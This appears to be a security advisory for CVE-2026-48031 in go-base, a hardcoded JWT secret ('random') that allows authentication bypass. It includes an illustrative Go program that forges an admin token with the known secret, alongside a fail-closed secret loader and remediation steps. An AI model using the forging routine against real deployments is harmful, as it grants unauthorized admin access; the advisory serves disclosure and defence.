PT-2026-48473 · Go-Base · Go-Base

Published 2026-06-10 · Updated 2026-06-10 · CVE-2026-48031

CVSS v3.1: 9.1 Critical
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: go-base, versions prior to the May 17, 2026 patch

Description: The software ships a hardcoded JWT signing secret, the string "random", both in the dev.env template and as the programmatic fallback set by viper.SetDefault() in cmd/serve.go. An earlier attempt to mitigate this in auth/jwt/tokenauth.go, which replaced the secret with a randomly generated 32-byte key, was ineffective: it triggered only when the configured value was the literal string "random", and it held the generated key only in memory, so every application restart rotated the key and invalidated all active sessions.

An attacker who knows the secret can forge JWTs for any user, including users with administrative roles, which amounts to a complete authentication bypass. Forged tokens grant unauthorized access to protected API endpoints such as /api/v1/admin/users and /api/v1/me, and can be exchanged for fresh tokens via /api/v1/token/refresh. The affected code is the GenTokenPair() function and the auth_jwt_secret configuration value (AUTH_JWT_SECRET in the environment).

Recommendations: Update to the latest version of the software, set AUTH_JWT_SECRET to a strong random value (e.g., the output of openssl rand -base64 32), and restart the application. Because the tokens are stateless, rotating the secret also invalidates every token issued under the old one, so all users will have to re-authenticate; that is the intended outcome, since any token minted with the old secret may have been forged.
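The following Go program is an added illustration, not code from go-base or from this advisory. It shows why a published signing secret is a full authentication bypass: anyone can mint an HS256 token for an admin role offline, and a server still signing with the shipped placeholder accepts it. Beside the vulnerable fallback it shows a fail-closed loader that refuses a missing or placeholder secret and enforces a 32-byte minimum, matching the openssl rand -base64 32 recommendation. The claim field names (sub, roles), the AUTH_JWT_SECRET environment variable name and the JWT helpers are assumptions for illustration; only the standard library is used so it runs stand-alone.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Claims is a stand-in for the access-token claims (field names assumed, not go-base's).
type Claims struct {
	Sub   string   `json:"sub"`
	Roles []string `json:"roles"`
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// signHS256 builds a compact HS256 JWS; with a known secret an attacker runs this offline.
func signHS256(c Claims, secret []byte) string {
	payload, _ := json.Marshal(c) // cannot fail for this struct
	input := b64([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64(payload)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(input))
	return input + "." + b64(mac.Sum(nil))
}

// verifyHS256 checks a token the way auth middleware would: alg pinned, constant-time MAC compare.
func verifyHS256(token string, secret []byte) (Claims, error) {
	var c Claims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, errors.New("malformed token")
	}
	dec := base64.RawURLEncoding.DecodeString
	hdr, e1 := dec(parts[0])
	payload, e2 := dec(parts[1])
	sig, e3 := dec(parts[2])
	if e1 != nil || e2 != nil || e3 != nil {
		return c, errors.New("bad base64")
	}
	var h struct{ Alg string `json:"alg"` }
	if err := json.Unmarshal(hdr, &h); err != nil || h.Alg != "HS256" {
		return c, errors.New("unexpected alg")
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return c, errors.New("bad signature")
	}
	if err := json.Unmarshal(payload, &c); err != nil {
		return Claims{}, err
	}
	return c, nil
}

// placeholderSecret is the value shipped in dev.env and set by viper.SetDefault().
const placeholderSecret = "random"

// vulnerableSecret mirrors the pre-patch fallback: an unset secret silently
// becomes the shipped placeholder, so every such deployment shares one key.
func vulnerableSecret(configured string) []byte {
	if configured == "" {
		configured = placeholderSecret
	}
	return []byte(configured)
}

// loadSecretStrict fails closed: no fallback, the placeholder is rejected, and
// the key must be at least 32 bytes (what `openssl rand -base64 32` yields).
func loadSecretStrict(configured string) ([]byte, error) {
	if configured == "" {
		return nil, errors.New("AUTH_JWT_SECRET is not set; refusing to start")
	}
	if configured == placeholderSecret {
		return nil, errors.New("AUTH_JWT_SECRET is the shipped placeholder; refusing to start")
	}
	key, err := base64.StdEncoding.DecodeString(configured)
	if err != nil {
		key = []byte(configured) // raw strings are allowed; length is still enforced
	}
	if len(key) < 32 {
		return nil, fmt.Errorf("AUTH_JWT_SECRET is %d bytes, need at least 32", len(key))
	}
	return key, nil
}

func main() {
	tok := signHS256(Claims{Sub: "attacker", Roles: []string{"admin"}}, []byte(placeholderSecret))
	_, err := verifyHS256(tok, vulnerableSecret("")) // deployment that never set the secret
	fmt.Println("fallback secret accepts forged admin token:", err == nil)
	raw := make([]byte, 32) // equivalent of `openssl rand -base64 32`
	rand.Read(raw)
	key, _ := loadSecretStrict(base64.StdEncoding.EncodeToString(raw))
	_, err = verifyHS256(tok, key)
	fmt.Println("generated secret rejects forged token:", err != nil)
}
```

The same forging routine doubles as a post-patch check: sign a token with the secret "random" and confirm the upgraded instance answers /api/v1/me with an authentication failure rather than a user record.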

Fix

Weakness Enumeration

Using Hardcoded Credentials (CWE-798)

Related Identifiers

CVE-2026-48031
GHSA-MQQ6-462X-JXMM

Affected Products

Go-Base